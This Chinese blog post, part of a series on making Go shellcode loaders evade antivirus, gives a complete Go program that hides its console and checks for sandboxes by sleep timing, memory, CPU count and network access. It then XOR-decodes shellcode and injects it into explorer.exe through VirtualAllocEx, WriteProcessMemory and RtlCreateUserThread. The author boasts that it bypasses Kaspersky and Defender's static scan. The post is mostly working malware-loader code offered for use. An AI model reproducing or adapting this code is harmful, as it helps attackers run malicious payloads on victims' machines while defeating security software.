基于Go的RtlCreateUserThread_API注入explorer.exe(Ⅲ)
2022-09-05 22:15:00 # 基于Go实现shellcode免杀系列

基于Go的RtlCreateUserThread_API注入explorer.exe(Ⅲ)

…..待更新

完整代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
package main

import (
_ "embed"
"encoding/hex"
"fmt"
"github.com/gonutz/ide/w32"
ps "github.com/mitchellh/go-ps"
"golang.org/x/sys/windows"
"net/http"
"net/url"
"runtime"
"strconv"
"syscall"
"time"
"unsafe"
)
func Xor(src string) string {
var XorKey = []byte{0x74, 0x69, 0x64, 0x65, 0x62, 0x79, 0x70, 0x61, 0x73, 0x73} //tidesec
var result string
var s int64
j := 0
bt := []rune(src)
for i := 0; i < len(src)/2; i++ {
s, _ = strconv.ParseInt(string(bt[i*2:i*2+2]), 16, 0)
result = result + string(byte(s)^XorKey[j])
j = (j + 1) % 10
}
return result
}
func ShowConsoleAsync(commandShow uintptr) {
console := w32.GetConsoleWindow()
if console != 0 {
_, consoleProcID := w32.GetWindowThreadProcessId(console)
if w32.GetCurrentProcessId() == consoleProcID {
w32.ShowWindowAsync(console, commandShow)
}
}
}
//延迟运行
func timeSleep() (int, error) {
startTime := time.Now()
time.Sleep(5 * time.Second)
endTime := time.Now()
sleepTime := endTime.Sub(startTime)
if sleepTime >= 5*time.Second {
return 1, nil
} else {
return 0, nil
}
}

//检测物理内存
func physicalMemory() (int, error) {
var mod = syscall.NewLazyDLL("kernel32.dll")
var proc = mod.NewProc("GetPhysicallyInstalledSystemMemory")
var mem uint64
proc.Call(uintptr(unsafe.Pointer(&mem)))
mem = mem / 1048576
if mem < 4 {
return 0, nil
}
return 1, nil
}

//检测CPU核心数,大于四个返回1
func numberOfCPU() (int, error) {
a := runtime.NumCPU()
if a < 4 {
return 0, nil
} else {
return 1, nil
}
}
//检测网络连通性
func NetworkCheck() (int, error) {
u, _ := url.Parse("https://www.baidu.com/") //检查网络连通性
q := u.Query()
u.RawQuery = q.Encode()
res, err := http.Get(u.String())
resCode := res.StatusCode
res.Body.Close()
if resCode == 200 {
return 1, err
}
return 0, err
}

func main() {
ShowConsoleAsync(w32.SW_HIDE)
resStatus, _ := NetworkCheck() //检测网络连通性
sleeptime, _ := timeSleep() //延迟运行是否成功
physicalMemory, _ := physicalMemory() //物理内存是否大于4g,大于4g返回1
cpuNumber, _ := numberOfCPU() //cpu核心数量,大于4返回1
if resStatus == 1 && sleeptime == 1 && physicalMemory == 1 && cpuNumber == 1 {
var sc = "Xor之后的shellcode"
scxor := Xor(sc)
shellcode, _ := hex.DecodeString(scxor)
processList, err := ps.Processes()
if err != nil {
return
}
var pid int
for _, process := range processList {
if process.Executable() == "explorer.exe" {
pid = process.Pid()
break
}
}
kernel32 := windows.NewLazySystemDLL("kernel32.dll")
ntdll := windows.NewLazySystemDLL("ntdll.dll")
OpenProcess := kernel32.NewProc("OpenProcess")
VirtualAllocEx := kernel32.NewProc("VirtualAllocEx")
VirtualProtectEx := kernel32.NewProc("VirtualProtectEx")
WriteProcessMemory := kernel32.NewProc("WriteProcessMemory")
RtlCreateUserThread := ntdll.NewProc("RtlCreateUserThread")
CloseHandle := kernel32.NewProc("CloseHandle")
pHandle, _, _ := OpenProcess.Call(windows.PROCESS_CREATE_THREAD|windows.PROCESS_VM_OPERATION|
windows.PROCESS_VM_WRITE|windows.PROCESS_VM_READ|windows.PROCESS_QUERY_INFORMATION,
0, uintptr(uint32(pid)))
addr, _, _ := VirtualAllocEx.Call(pHandle, 0, uintptr(len(shellcode)),
windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_READWRITE)
fmt.Println("ok")
_, _, _ = WriteProcessMemory.Call(pHandle, addr, (uintptr)(unsafe.Pointer(&shellcode[0])),
uintptr(len(shellcode)))
oldProtect := windows.PAGE_READWRITE
_, _, _ = VirtualProtectEx.Call(pHandle, addr, uintptr(len(shellcode)),
windows.PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&oldProtect)))
var tHandle uintptr
_, _, _ = RtlCreateUserThread.Call(pHandle, 0, 0, 0, 0, 0, addr, 0,
uintptr(unsafe.Pointer(&tHandle)), 0)
_, _, _ = CloseHandle.Call(uintptr(uint32(pHandle)))
}
}

免杀效果

卡巴斯基 静态动态都过了,Defender静态也过了,但是动态还是会被杀…🤣🤣🤣

VT没敢丢上去,怕一直上线….

image-20220905225405509

image-20220905225418631

image-20220905221106569